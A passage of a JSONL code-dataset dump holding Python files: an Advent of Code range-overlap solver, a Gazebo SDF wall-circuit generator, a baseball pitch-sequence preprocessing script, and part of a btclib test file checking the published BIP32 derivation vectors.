\".txt\") as fp:\n data = fp.readlines()\n for line in data:\n left, right = line.split(\",\")\n left = left.split(\"-\")\n right = right.split(\"-\")\n yield ((int(left[0]), int(left[1])), (int(right[0]), int(right[1])))\n\n\ndef check_full_overlap(left, right):\n if left[0] <= right[0] and left[1] >= right[1]:\n return True\n left, right = right, left\n if left[0] <= right[0] and left[1] >= right[1]:\n return True\n\n\ndef check_partial_overlap(left, right):\n overlaps = (\n (left[0], right[0], left[1]),\n (left[0], right[1], left[1]),\n (right[0], left[0], right[1]),\n (right[0], left[1], right[1]),\n )\n for l, m, r in overlaps:\n if l <= m <= r:\n return True\n\n\ndef main_a():\n count = 0\n for left, right in parse_data():\n if check_full_overlap(right, left):\n count += 1\n print(count)\n\n\ndef main_b():\n count = 0\n for left, right in parse_data():\n if check_partial_overlap(left, right):\n count += 1\n print(count)\n\n\nif __name__ == \"__main__\":\n # main_a()\n main_b()\n","sub_path":"2022/aoc04.py","file_name":"aoc04.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"399969162","text":"from xml.dom import minidom\nimport xml.etree.ElementTree as ET\n\ndAperture = .99\nyWallSize = 0.01\nzWallSize = 0.4\nenvMaxSize = 5.01\nsectioSize = 2.99\nnum_walls = 12\n\nenvMaterial = 'Wood'\nsdf = ET.Element('sdf',attrib={'version':'1.6'})\nmodel = ET.SubElement(sdf, 'model', attrib={'name':'circuit_left_right_turns'})\nET.SubElement(model, 'pose', attrib={'frame':''}).text = '0 0 0 0 -0 0'\n\nyWallHalfSize = yWallSize/2\nzWallHalfSize = zWallSize/2\ninEnvSize = envMaxSize - (2 * yWallSize)\n\nclass Wall:\n xWallSize = None\n xWallPose = None\n yWallPose = None\n yawWallPose = None\n\nwalls = [Wall() for _ in range(num_walls)]\n\nwalls[0].xWallSize = envMaxSize - yWallSize\nwalls[0].xWallPose = yWallHalfSize\nwalls[0].yWallPose = walls[0].xWallSize/2\nwalls[0].yawWallPose = 1.5708\n\nwalls[1].xWallSize = sectioSize + yWallSize\nwalls[1].xWallPose = walls[1].xWallSize/2\nwalls[1].yWallPose = walls[0].xWallSize + yWallHalfSize\nwalls[1].yawWallPose = 0\n\nwalls[2].xWallSize = inEnvSize - walls[1].xWallSize + yWallSize\nwalls[2].xWallPose = walls[0].xWallPose + walls[1].xWallSize\nwalls[2].yWallPose = walls[1].yWallPose - (walls[2].xWallSize/2) + yWallHalfSize\nwalls[2].yawWallPose = 1.5708\n\nwalls[3].xWallSize = walls[2].xWallSize\nwalls[3].xWallPose = walls[2].yWallPose - yWallSize\nwalls[3].yWallPose = walls[2].xWallPose \nwalls[3].yawWallPose = 0\n\nwalls[4].xWallSize = walls[1].xWallSize\nwalls[4].xWallPose = walls[1].yWallPose\nwalls[4].yWallPose = walls[1].xWallPose + yWallSize\nwalls[4].yawWallPose = 1.5708\n\nwalls[5].xWallSize = walls[0].xWallSize\nwalls[5].xWallPose = walls[0].yWallPose + yWallSize\nwalls[5].yWallPose = walls[0].xWallPose\nwalls[5].yawWallPose = 0\n\nwalls[6].xWallSize = inEnvSize - (2*dAperture + yWallSize)\nwalls[6].xWallPose = yWallSize + dAperture + yWallHalfSize\nwalls[6].yWallPose = walls[0].yWallPose\nwalls[6].yawWallPose = 1.5708\n\nwalls[7].xWallSize = walls[1].xWallSize - (2*yWallSize) - (2*dAperture)\nwalls[7].xWallPose = walls[1].xWallPose\nwalls[7].yWallPose = walls[6].yWallPose + (walls[6].xWallSize/2) + yWallHalfSize\nwalls[7].yawWallPose = 0\n\nwalls[8].xWallSize = walls[2].xWallSize\nwalls[8].xWallPose = walls[6].xWallPose + walls[7].xWallSize\nwalls[8].yWallPose = walls[7].yWallPose - (walls[8].xWallSize/2) + yWallHalfSize\nwalls[8].yawWallPose = 1.5708\n\nwalls[9].xWallSize = walls[8].xWallSize\nwalls[9].xWallPose = walls[8].yWallPose - yWallSize\nwalls[9].yWallPose = walls[8].xWallPose \nwalls[9].yawWallPose = 0\n\nwalls[10].xWallSize = walls[7].xWallSize\nwalls[10].xWallPose = walls[7].yWallPose\nwalls[10].yWallPose = walls[4].yWallPose\nwalls[10].yawWallPose = 1.5708\n\nwalls[11].xWallSize = walls[6].xWallSize\nwalls[11].xWallPose = walls[5].xWallPose\nwalls[11].yWallPose = walls[6].xWallPose\nwalls[11].yawWallPose = 0\n\nfor i in range(num_walls):\n\n link = ET.SubElement(model, 'link', attrib={'name':'Wall_' + str(i)})\n\n collision = ET.SubElement(link, 'collision', attrib={'name':'Wall_' + str(i) + '_Collision'})\n\n ET.SubElement(ET.SubElement(ET.SubElement(collision, 'geometry'), 'box'), 'size').text = \\\n str(walls[i].xWallSize) + ' ' + str(yWallSize) + ' ' + str(zWallSize)\n\n ET.SubElement(collision, 'pose', attrib={'frame':''}).text = \\\n '0 0 ' + str(zWallHalfSize) + ' 0 -0 0'\n\n visual = ET.SubElement(link, 'visual', attrib={'name':'Wall_' + str(i) + '_Visual'})\n\n ET.SubElement(visual, 'pose', attrib={'frame':''}).text = \\\n '0 0 ' + str(zWallHalfSize) + ' 0 -0 0'\n\n ET.SubElement(ET.SubElement(ET.SubElement(visual, 'geometry'), 'box'), 'size').text = \\\n str(walls[i].xWallSize) + ' ' + str(yWallSize) + ' ' + str(zWallSize)\n\n material = ET.SubElement(visual, 'material')\n\n script = ET.SubElement(material, 'script')\n\n ET.SubElement(script, 'uri').text = 'file://media/materials/scripts/gazebo.material'\n ET.SubElement(script, 'name').text = 'Gazebo/' + envMaterial\n\n ET.SubElement(material, 'ambient').text = '1 1 1 1'\n\n ET.SubElement(link, 'pose', attrib={'frame':''}).text = \\\n str(walls[i].xWallPose) + ' ' + str(walls[i].yWallPose) + ' 0 0 -0 ' + str(walls[i].yawWallPose)\n\n\nET.SubElement(model, 'static').text = '1'\n\ntree = minidom.parseString(ET.tostring(sdf)).toprettyxml(indent=\" \")\nwith open('model.sdf', \"w\") as fh:\n fh.write(tree)","sub_path":"scripts/create_circuit_left_right_turns.py","file_name":"create_circuit_left_right_turns.py","file_ext":"py","file_size_in_byte":4262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"230871158","text":"import pandas as pd\nimport h5py\nimport numpy as np\nfrom sklearn.preprocessing import StandardScaler, MinMaxScaler\nimport argparse\n\n'''\nThis script loads and transforms the data in 3 csv files (atbats, pitches,\nand player_names), transforming it into sequences of vectors suitable\nfor the deep learning pitch type prediction. The final sequences and vectors\nfor each atbat are stored in an h5 file for easly loading and retrieval.\n'''\n\ndef load_transform_data(abs, pitches):\n #read in csv files\n print('reading in data.')\n atbats = pd.read_csv(abs)\n pitcher_id = 453286 # --> Max Scherzer!!!!\n atbats = atbats[atbats['pitcher_id']==pitcher_id]\n pitches = pd.read_csv(pitches)\n\n # change key data type\n print('transforming data.')\n pitches['ab_id'] = pitches['ab_id'].astype(int)\n\n # get columns of interest\n ab_cols = ['inning', 'p_score', 'p_throws', 'stand', 'top', 'ab_id']\n pitch_cols = ['pitch_type', 'b_score', 'b_count', 's_count', 'outs',\n 'on_1b', 'on_2b', 'on_3b', 'ab_id', 'type']\n\n # merge pitches and atbats into 1 df\n df = pitches.merge(atbats, left_on='ab_id', right_on='ab_id')\n\n # drop abs containing infrequent pitch types\n low_counts = ['AB', 'FA', 'UN', 'PO', 'FO', 'EP', 'KN', 'IN', 'SC', 'KC', 'FS', 'SI']\n dropabs = df[df['pitch_type'].isin(low_counts)]['ab_id'].unique().tolist()\n df = df[~df['ab_id'].isin(dropabs)]\n df = df.dropna()\n\n # convert pitch types to numerics\n pitch_class = {\n 'FF': 0,\n 'SL': 1,\n 'CH': 2,\n 'CU': 3,\n 'FC': 4,\n 'FT': 5\n }\n\n # transform columns to usable format and scale values\n df['score_diff'] = df['p_score'] - df['b_score']\n score_scaler = StandardScaler()\n df['score_diff'] = score_scaler.fit_transform(df['score_diff'].values.reshape(-1, 1))\n inning_scaler = MinMaxScaler()\n df['inning'] = inning_scaler.fit_transform(df['inning'].values.reshape(-1, 1))\n df['p_R'] = (df['p_throws'] == 'R') * 1.0\n df['p_L'] = (df['p_throws'] == 'L') * 1.0\n df['b_R'] = (df['stand'] == 'R') * 1.0\n df['b_L'] = (df['stand'] == 'L') * 1.0\n df['pitch_class'] = df['pitch_type'].apply(lambda x: pitch_class[x])\n df['FF'] = (df['pitch_type'] == 'FF') * 1.0\n df['SL'] = (df['pitch_type'] == 'SL') * 1.0\n df['CH'] = (df['pitch_type'] == 'CH') * 1.0\n df['CU'] = (df['pitch_type'] == 'CU') * 1.0\n df['FC'] = (df['pitch_type'] == 'FC') * 1.0\n df['FT'] = (df['pitch_type'] == 'FT') * 1.0\n\n return df\n\ndef convert(data_frame):\n # define columns for each vector\n init_cols = ['score_diff', 'inning', 'outs', 'p_R', 'p_L', 'b_R',\n 'b_L', 'on_1b', 'on_2b', 'on_3b']\n seq_cols = ['FF', 'SL', 'CH', 'CU', 'FC', 'FT', 'b_count', 's_count']\n label_cols = 'pitch_class'\n\n # get ab_ids to loop through\n abs = data_frame['ab_id'].unique()\n\n # create lists for init, seq, and labels\n init = []\n seq = []\n labels = []\n lens = []\n\n # define seq and label shape to be of length 21\n seq_shape = (21, 8)\n label_shape = (22,)\n\n # for each ab, create vectors and add to list\n print('creating vectors.')\n abs_len = len(abs)\n for i, ab in enumerate(abs):\n if i % (abs_len // 100) == 0:\n print('%.2f' % (i / abs_len * 100), '% done!')\n atbat = data_frame[data_frame['ab_id']==ab].reset_index()\n init_vec = atbat[init_cols].loc[0].to_numpy()\n seq_data = atbat[seq_cols].to_numpy()\n label_data = atbat[label_cols].to_numpy()\n\n seq_len = seq_data.shape[0]\n seq_vecs = np.zeros(seq_shape)\n seq_vecs[:seq_data.shape[0]-1,:8] = seq_data[:-1,:]\n seq_vecs = np.insert(seq_vecs, 0, 0, axis=0)\n\n label_vecs = np.full(label_shape, np.nan)\n label_vecs[:len(label_data)] = label_data\n\n init.append(init_vec)\n seq.append(seq_vecs)\n labels.append(label_vecs)\n lens.append(seq_len)\n print('vectors created.')\n\n return np.array(init), np.array(seq), np.array(labels), np.array(lens)\n\ndef store(inits, seqs, labels, lens):\n # create h5 files for writing\n print('writing h5 file.')\n h5_file = 'baseballScherzer.h5'\n bballDB = h5py.File(h5_file, 'w')\n\n # add data to h5 database\n bballDB.create_dataset('pitch_seqs', data=seqs)\n bballDB.create_dataset('init_vecs', data=inits)\n bballDB.create_dataset('label_vecs', data=labels)\n bballDB.create_dataset('seq_lens', data=lens)\n\n # check data in h5 database\n print(bballDB.get('init_vecs')[0])\n print(bballDB.get('pitch_seqs')[0])\n print(bballDB.get('label_vecs')[0])\n print(bballDB.get('seq_lens')[0])\n\n # close file\n bballDB.close()\n\ndef main(atbats, pitches):\n pitch_data = load_transform_data(atbats, pitches)\n init, seq, label, length = convert(pitch_data)\n store(init, seq, label, length)\n print('h5 dataset created: ', 'baseballScherzer.h5')\n\nif __name__==\"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('-p', '--pitch_file', help='pitches csv file')\n parser.add_argument('-ab', '--atbat_file', help='atbats csv file')\n args = parser.parse_args()\n atbats = args.atbat_file\n pitches = args.pitch_file\n main(atbats, pitches)\n","sub_path":"clean_data_SCHERZER.py","file_name":"clean_data_SCHERZER.py","file_ext":"py","file_size_in_byte":5235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"7743759","text":"#!/usr/bin/env python3\n\n# Copyright (C) 2017-2019 The btclib developers\n#\n# This file is part of btclib. It is subject to the license terms in the\n# LICENSE file found in the top-level directory of this distribution.\n#\n# No part of btclib including this file, may be copied, modified, propagated,\n# or distributed except according to the terms contained in the LICENSE file.\n\nimport unittest\nimport os\nimport json\n\nfrom btclib import base58\nfrom btclib import bip32, bip39\n\nclass TestBIP32(unittest.TestCase):\n def test_vector1(self):\n \"\"\"BIP32 test vestor 1\n https://github.com/bitcoin/bips/blob/master/bip-0032.mediawiki\n \"\"\"\n xkey_version = bip32.PRV_VERSION[0]\n\n seed = \"000102030405060708090a0b0c0d0e0f\"\n rootxprv = bip32.rootxprv_from_seed(seed, xkey_version)\n self.assertEqual(rootxprv,\n b\"xprv9s21ZrQH143K3QTDL4LXw2F7HEK3wJUD2nW2nRk4stbPy6cq3jPPqjiChkVvvNKmPGJxWUtg6LnF5kejMRNNU3TGtRBeJgk33yuGBxrMPHi\")\n rootxprv = bip32.rootxprv_from_seed(seed, xkey_version.hex())\n self.assertEqual(rootxprv,\n b\"xprv9s21ZrQH143K3QTDL4LXw2F7HEK3wJUD2nW2nRk4stbPy6cq3jPPqjiChkVvvNKmPGJxWUtg6LnF5kejMRNNU3TGtRBeJgk33yuGBxrMPHi\")\n rootxpub = bip32.xpub_from_xprv(rootxprv) # neutering\n self.assertEqual(rootxpub,\n b\"xpub661MyMwAqRbcFtXgS5sYJABqqG9YLmC4Q1Rdap9gSE8NqtwybGhePY2gZ29ESFjqJoCu1Rupje8YtGqsefD265TMg7usUDFdp6W1EGMcet8\")\n\n xprv = rootxprv\n xpub = rootxpub\n\n xprv = bip32.derive(xprv, \".\") # private relative\n self.assertEqual(xprv,\n b\"xprv9s21ZrQH143K3QTDL4LXw2F7HEK3wJUD2nW2nRk4stbPy6cq3jPPqjiChkVvvNKmPGJxWUtg6LnF5kejMRNNU3TGtRBeJgk33yuGBxrMPHi\")\n xprv = bip32.derive(rootxprv, \"m\") # private absolute\n self.assertEqual(xprv,\n b\"xprv9s21ZrQH143K3QTDL4LXw2F7HEK3wJUD2nW2nRk4stbPy6cq3jPPqjiChkVvvNKmPGJxWUtg6LnF5kejMRNNU3TGtRBeJgk33yuGBxrMPHi\")\n xpub = bip32.derive(xpub, \".\") # public relative\n self.assertEqual(xpub,\n b\"xpub661MyMwAqRbcFtXgS5sYJABqqG9YLmC4Q1Rdap9gSE8NqtwybGhePY2gZ29ESFjqJoCu1Rupje8YtGqsefD265TMg7usUDFdp6W1EGMcet8\")\n xpub = bip32.derive(rootxpub, \"m\") # public absolute\n self.assertEqual(xpub,\n b\"xpub661MyMwAqRbcFtXgS5sYJABqqG9YLmC4Q1Rdap9gSE8NqtwybGhePY2gZ29ESFjqJoCu1Rupje8YtGqsefD265TMg7usUDFdp6W1EGMcet8\")\n xpub = bip32.xpub_from_xprv(xprv) # neutering\n self.assertEqual(xpub,\n b\"xpub661MyMwAqRbcFtXgS5sYJABqqG9YLmC4Q1Rdap9gSE8NqtwybGhePY2gZ29ESFjqJoCu1Rupje8YtGqsefD265TMg7usUDFdp6W1EGMcet8\")\n\n xprv = bip32.derive(xprv, \"./0'\") # private relative\n self.assertEqual(xprv,\n b\"xprv9uHRZZhk6KAJC1avXpDAp4MDc3sQKNxDiPvvkX8Br5ngLNv1TxvUxt4cV1rGL5hj6KCesnDYUhd7oWgT11eZG7XnxHrnYeSvkzY7d2bhkJ7\")\n xprv = bip32.derive(rootxprv, \"m/0'\") # private absolute\n self.assertEqual(xprv,\n b\"xprv9uHRZZhk6KAJC1avXpDAp4MDc3sQKNxDiPvvkX8Br5ngLNv1TxvUxt4cV1rGL5hj6KCesnDYUhd7oWgT11eZG7XnxHrnYeSvkzY7d2bhkJ7\")\n xpub = bip32.xpub_from_xprv(xprv) # neutering\n self.assertEqual(xpub,\n b\"xpub68Gmy5EdvgibQVfPdqkBBCHxA5htiqg55crXYuXoQRKfDBFA1WEjWgP6LHhwBZeNK1VTsfTFUHCdrfp1bgwQ9xv5ski8PX9rL2dZXvgGDnw\")\n\n xprv = bip32.derive(xprv, \"./1\") # private relative\n self.assertEqual(xprv,\n b\"xprv9wTYmMFdV23N2TdNG573QoEsfRrWKQgWeibmLntzniatZvR9BmLnvSxqu53Kw1UmYPxLgboyZQaXwTCg8MSY3H2EU4pWcQDnRnrVA1xe8fs\")\n xprv = bip32.derive(rootxprv, \"m/0'/1\") # private absolute\n self.assertEqual(xprv,\n b\"xprv9wTYmMFdV23N2TdNG573QoEsfRrWKQgWeibmLntzniatZvR9BmLnvSxqu53Kw1UmYPxLgboyZQaXwTCg8MSY3H2EU4pWcQDnRnrVA1xe8fs\")\n xpub = bip32.derive(xpub, \"./1\") # public relative\n self.assertEqual(xpub,\n b\"xpub6ASuArnXKPbfEwhqN6e3mwBcDTgzisQN1wXN9BJcM47sSikHjJf3UFHKkNAWbWMiGj7Wf5uMash7SyYq527Hqck2AxYysAA7xmALppuCkwQ\")\n xpub = bip32.xpub_from_xprv(xprv) # neutering\n self.assertEqual(xpub,\n b\"xpub6ASuArnXKPbfEwhqN6e3mwBcDTgzisQN1wXN9BJcM47sSikHjJf3UFHKkNAWbWMiGj7Wf5uMash7SyYq527Hqck2AxYysAA7xmALppuCkwQ\")\n\n xprv = bip32.derive(xprv, \"./2H\") # private relative\n self.assertEqual(xprv,\n b\"xprv9z4pot5VBttmtdRTWfWQmoH1taj2axGVzFqSb8C9xaxKymcFzXBDptWmT7FwuEzG3ryjH4ktypQSAewRiNMjANTtpgP4mLTj34bhnZX7UiM\")\n xprv = bip32.derive(rootxprv, \"m/0'/1/2'\") # private absolute\n self.assertEqual(xprv,\n b\"xprv9z4pot5VBttmtdRTWfWQmoH1taj2axGVzFqSb8C9xaxKymcFzXBDptWmT7FwuEzG3ryjH4ktypQSAewRiNMjANTtpgP4mLTj34bhnZX7UiM\")\n xpub = bip32.xpub_from_xprv(xprv) # neutering\n self.assertEqual(xpub,\n b\"xpub6D4BDPcP2GT577Vvch3R8wDkScZWzQzMMUm3PWbmWvVJrZwQY4VUNgqFJPMM3No2dFDFGTsxxpG5uJh7n7epu4trkrX7x7DogT5Uv6fcLW5\")\n\n xprv = bip32.derive(xprv, \"./2\") # private relative\n self.assertEqual(xprv,\n b\"xprvA2JDeKCSNNZky6uBCviVfJSKyQ1mDYahRjijr5idH2WwLsEd4Hsb2Tyh8RfQMuPh7f7RtyzTtdrbdqqsunu5Mm3wDvUAKRHSC34sJ7in334\")\n xprv = bip32.derive(rootxprv, \"m/0'/1/2'/2\") # private absolute\n self.assertEqual(\n xprv, b\"xprvA2JDeKCSNNZky6uBCviVfJSKyQ1mDYahRjijr5idH2WwLsEd4Hsb2Tyh8RfQMuPh7f7RtyzTtdrbdqqsunu5Mm3wDvUAKRHSC34sJ7in334\")\n xpub = bip32.derive(xpub, \"./2\") # public relative\n self.assertEqual(\n xpub, b\"xpub6FHa3pjLCk84BayeJxFW2SP4XRrFd1JYnxeLeU8EqN3vDfZmbqBqaGJAyiLjTAwm6ZLRQUMv1ZACTj37sR62cfN7fe5JnJ7dh8zL4fiyLHV\")\n xpub = bip32.xpub_from_xprv(xprv) # neutering\n self.assertEqual(\n xpub, b\"xpub6FHa3pjLCk84BayeJxFW2SP4XRrFd1JYnxeLeU8EqN3vDfZmbqBqaGJAyiLjTAwm6ZLRQUMv1ZACTj37sR62cfN7fe5JnJ7dh8zL4fiyLHV\")\n\n xprv = bip32.derive(xprv, \"./1000000000\") # private relative\n self.assertEqual(\n xprv, b\"xprvA41z7zogVVwxVSgdKUHDy1SKmdb533PjDz7J6N6mV6uS3ze1ai8FHa8kmHScGpWmj4WggLyQjgPie1rFSruoUihUZREPSL39UNdE3BBDu76\")\n xprv = bip32.derive(rootxprv, \"m/0'/1/2'/2/1000000000\") # private absolute\n self.assertEqual(\n xprv, b\"xprvA41z7zogVVwxVSgdKUHDy1SKmdb533PjDz7J6N6mV6uS3ze1ai8FHa8kmHScGpWmj4WggLyQjgPie1rFSruoUihUZREPSL39UNdE3BBDu76\")\n xpub = bip32.derive(xpub, \"./1000000000\") # public relative\n self.assertEqual(\n xpub, b\"xpub6H1LXWLaKsWFhvm6RVpEL9P4KfRZSW7abD2ttkWP3SSQvnyA8FSVqNTEcYFgJS2UaFcxupHiYkro49S8yGasTvXEYBVPamhGW6cFJodrTHy\")\n xpub = bip32.xpub_from_xprv(xprv) # neutering\n self.assertEqual(\n xpub, b\"xpub6H1LXWLaKsWFhvm6RVpEL9P4KfRZSW7abD2ttkWP3SSQvnyA8FSVqNTEcYFgJS2UaFcxupHiYkro49S8yGasTvXEYBVPamhGW6cFJodrTHy\")\n\n def test_vector2(self):\n \"\"\"BIP32 test vestor 2\n https://github.com/bitcoin/bips/blob/master/bip-0032.mediawiki\n \"\"\"\n xkey_version = bip32.PRV_VERSION[0]\n\n seed = \"fffcf9f6f3f0edeae7e4e1dedbd8d5d2cfccc9c6c3c0bdbab7b4b1aeaba8a5a29f9c999693908d8a8784817e7b7875726f6c696663605d5a5754514e4b484542\"\n rootxprv = bip32.rootxprv_from_seed(seed, xkey_version)\n self.assertEqual(\n rootxprv, b\"xprv9s21ZrQH143K31xYSDQpPDxsXRTUcvj2iNHm5NUtrGiGG5e2DtALGdso3pGz6ssrdK4PFmM8NSpSBHNqPqm55Qn3LqFtT2emdEXVYsCzC2U\")\n rootxpub = bip32.xpub_from_xprv(rootxprv) # neutering\n self.assertEqual(\n rootxpub, b\"xpub661MyMwAqRbcFW31YEwpkMuc5THy2PSt5bDMsktWQcFF8syAmRUapSCGu8ED9W6oDMSgv6Zz8idoc4a6mr8BDzTJY47LJhkJ8UB7WEGuduB\")\n xprv = rootxprv\n xpub = rootxpub\n\n xprv = bip32.derive(xprv, \".\") # private relative\n self.assertEqual(\n xprv, b\"xprv9s21ZrQH143K31xYSDQpPDxsXRTUcvj2iNHm5NUtrGiGG5e2DtALGdso3pGz6ssrdK4PFmM8NSpSBHNqPqm55Qn3LqFtT2emdEXVYsCzC2U\")\n xprv = bip32.derive(rootxprv, \"m\") # private absolute\n self.assertEqual(\n xprv, b\"xprv9s21ZrQH143K31xYSDQpPDxsXRTUcvj2iNHm5NUtrGiGG5e2DtALGdso3pGz6ssrdK4PFmM8NSpSBHNqPqm55Qn3LqFtT2emdEXVYsCzC2U\")\n xpub = bip32.derive(xpub, \".\") # public relative\n self.assertEqual(\n xpub, b\"xpub661MyMwAqRbcFW31YEwpkMuc5THy2PSt5bDMsktWQcFF8syAmRUapSCGu8ED9W6oDMSgv6Zz8idoc4a6mr8BDzTJY47LJhkJ8UB7WEGuduB\")\n xpub = bip32.derive(rootxpub, \"m\") # public absolute\n self.assertEqual(\n xpub, b\"xpub661MyMwAqRbcFW31YEwpkMuc5THy2PSt5bDMsktWQcFF8syAmRUapSCGu8ED9W6oDMSgv6Zz8idoc4a6mr8BDzTJY47LJhkJ8UB7WEGuduB\")\n xpub = bip32.xpub_from_xprv(xprv) # neutering\n self.assertEqual(\n xpub, b\"xpub661MyMwAqRbcFW31YEwpkMuc5THy2PSt5bDMsktWQcFF8syAmRUapSCGu8ED9W6oDMSgv6Zz8idoc4a6mr8BDzTJY47LJhkJ8UB7WEGuduB\")\n\n xprv = bip32.derive(xprv, \"./0\") # private relative\n self.assertEqual(\n xprv, b\"xprv9vHkqa6EV4sPZHYqZznhT2NPtPCjKuDKGY38FBWLvgaDx45zo9WQRUT3dKYnjwih2yJD9mkrocEZXo1ex8G81dwSM1fwqWpWkeS3v86pgKt\")\n xprv = bip32.derive(rootxprv, \"m/0\") # private absolute\n self.assertEqual(\n xprv, b\"xprv9vHkqa6EV4sPZHYqZznhT2NPtPCjKuDKGY38FBWLvgaDx45zo9WQRUT3dKYnjwih2yJD9mkrocEZXo1ex8G81dwSM1fwqWpWkeS3v86pgKt\")\n xpub = bip32.derive(xpub, \"./0\") # public relative\n self.assertEqual(\n xpub, b\"xpub69H7F5d8KSRgmmdJg2KhpAK8SR3DjMwAdkxj3ZuxV27CprR9LgpeyGmXUbC6wb7ERfvrnKZjXoUmmDznezpbZb7ap6r1D3tgFxHmwMkQTPH\")\n xpub = bip32.derive(rootxpub, \"m/0\") # public absolute\n self.assertEqual(\n xpub, b\"xpub69H7F5d8KSRgmmdJg2KhpAK8SR3DjMwAdkxj3ZuxV27CprR9LgpeyGmXUbC6wb7ERfvrnKZjXoUmmDznezpbZb7ap6r1D3tgFxHmwMkQTPH\")\n xpub = bip32.xpub_from_xprv(xprv) # neutering\n self.assertEqual(\n xpub, b\"xpub69H7F5d8KSRgmmdJg2KhpAK8SR3DjMwAdkxj3ZuxV27CprR9LgpeyGmXUbC6wb7ERfvrnKZjXoUmmDznezpbZb7ap6r1D3tgFxHmwMkQTPH\")\n\n xprv = bip32.derive(xprv, \"./2147483647H\") # private relative\n self.assertEqual(\n xprv, b\"xprv9wSp6B7kry3Vj9m1zSnLvN3xH8RdsPP1Mh7fAaR7aRLcQMKTR2vidYEeEg2mUCTAwCd6vnxVrcjfy2kRgVsFawNzmjuHc2YmYRmagcEPdU9\")\n xprv = bip32.derive(rootxprv, \"m/0/2147483647H\") # private absolute\n self.assertEqual(\n xprv, b\"xprv9wSp6B7kry3Vj9m1zSnLvN3xH8RdsPP1Mh7fAaR7aRLcQMKTR2vidYEeEg2mUCTAwCd6vnxVrcjfy2kRgVsFawNzmjuHc2YmYRmagcEPdU9\")\n xpub = bip32.xpub_from_xprv(xprv) # neutering\n self.assertEqual(\n xpub, b\"xpub6ASAVgeehLbnwdqV6UKMHVzgqAG8Gr6riv3Fxxpj8ksbH9ebxaEyBLZ85ySDhKiLDBrQSARLq1uNRts8RuJiHjaDMBU4Zn9h8LZNnBC5y4a\")\n\n xprv = bip32.derive(xprv, \"./1\") # private relative\n self.assertEqual(\n xprv, b\"xprv9zFnWC6h2cLgpmSA46vutJzBcfJ8yaJGg8cX1e5StJh45BBciYTRXSd25UEPVuesF9yog62tGAQtHjXajPPdbRCHuWS6T8XA2ECKADdw4Ef\")\n xprv = bip32.derive(rootxprv, \"m/0/2147483647H/1\") # private absolute\n self.assertEqual(\n xprv, b\"xprv9zFnWC6h2cLgpmSA46vutJzBcfJ8yaJGg8cX1e5StJh45BBciYTRXSd25UEPVuesF9yog62tGAQtHjXajPPdbRCHuWS6T8XA2ECKADdw4Ef\")\n xpub = bip32.derive(xpub, \"./1\") # public relative\n self.assertEqual(\n xpub, b\"xpub6DF8uhdarytz3FWdA8TvFSvvAh8dP3283MY7p2V4SeE2wyWmG5mg5EwVvmdMVCQcoNJxGoWaU9DCWh89LojfZ537wTfunKau47EL2dhHKon\")\n xpub = bip32.xpub_from_xprv(xprv) # neutering\n self.assertEqual(\n xpub, b\"xpub6DF8uhdarytz3FWdA8TvFSvvAh8dP3283MY7p2V4SeE2wyWmG5mg5EwVvmdMVCQcoNJxGoWaU9DCWh89LojfZ537wTfunKau47EL2dhHKon\")\n\n xprv = bip32.derive(xprv, \"./2147483646H\") # private relative\n self.assertEqual(\n xprv, b\"xprvA1RpRA33e1JQ7ifknakTFpgNXPmW2YvmhqLQYMmrj4xJXXWYpDPS3xz7iAxn8L39njGVyuoseXzU6rcxFLJ8HFsTjSyQbLYnMpCqE2VbFWc\")\n # private absolute\n xprv = bip32.derive(rootxprv, \"m/0/2147483647H/1/2147483646H\")\n self.assertEqual(\n xprv, b\"xprvA1RpRA33e1JQ7ifknakTFpgNXPmW2YvmhqLQYMmrj4xJXXWYpDPS3xz7iAxn8L39njGVyuoseXzU6rcxFLJ8HFsTjSyQbLYnMpCqE2VbFWc\")\n xpub = bip32.xpub_from_xprv(xprv) # neutering\n self.assertEqual(\n xpub, b\"xpub6ERApfZwUNrhLCkDtcHTcxd75RbzS1ed54G1LkBUHQVHQKqhMkhgbmJbZRkrgZw4koxb5JaHWkY4ALHY2grBGRjaDMzQLcgJvLJuZZvRcEL\")\n\n xprv = bip32.derive(xprv, \"./2\") # private relative\n self.assertEqual(\n xprv, b\"xprvA2nrNbFZABcdryreWet9Ea4LvTJcGsqrMzxHx98MMrotbir7yrKCEXw7nadnHM8Dq38EGfSh6dqA9QWTyefMLEcBYJUuekgW4BYPJcr9E7j\")\n # private absolute\n xprv = bip32.derive(rootxprv, \"m/0/2147483647H/1/2147483646H/2\")\n self.assertEqual(\n xprv, b\"xprvA2nrNbFZABcdryreWet9Ea4LvTJcGsqrMzxHx98MMrotbir7yrKCEXw7nadnHM8Dq38EGfSh6dqA9QWTyefMLEcBYJUuekgW4BYPJcr9E7j\")\n xpub = bip32.derive(xpub, \"./2\") # public relative\n self.assertEqual(\n xpub, b\"xpub6FnCn6nSzZAw5Tw7cgR9bi15UV96gLZhjDstkXXxvCLsUXBGXPdSnLFbdpq8p9HmGsApME5hQTZ3emM2rnY5agb9rXpVGyy3bdW6EEgAtqt\")\n xpub = bip32.xpub_from_xprv(xprv) # neutering\n self.assertEqual(\n xpub, b\"xpub6FnCn6nSzZAw5Tw7cgR9bi15UV96gLZhjDstkXXxvCLsUXBGXPdSnLFbdpq8p9HmGsApME5hQTZ3emM2rnY5agb9rXpVGyy3bdW6EEgAtqt\")\n\n def test_vector3(self):\n \"\"\"BIP32 test vestor 3\n https://github.com/bitcoin/bips/blob/master/bip-0032.mediawiki\n \"\"\"\n xkey_version = bip32.PRV_VERSION[0]\n\n seed = \"4b381541583be4423346c643850da4b320e46a87ae3d2a4e6da11eba819cd4acba45d239319ac14f863b8d5ab5a0d0c64d2e8a1e7d1457df2e5a3c51c73235be\"\n rootxprv = bip32.rootxprv_from_seed(seed, xkey_version)\n self.assertEqual(\n rootxprv, b\"xprv9s21ZrQH143K25QhxbucbDDuQ4naNntJRi4KUfWT7xo4EKsHt2QJDu7KXp1A3u7Bi1j8ph3EGsZ9Xvz9dGuVrtHHs7pXeTzjuxBrCmmhgC6\")\n rootxpub = bip32.xpub_from_xprv(rootxprv) # neutering\n self.assertEqual(\n rootxpub, 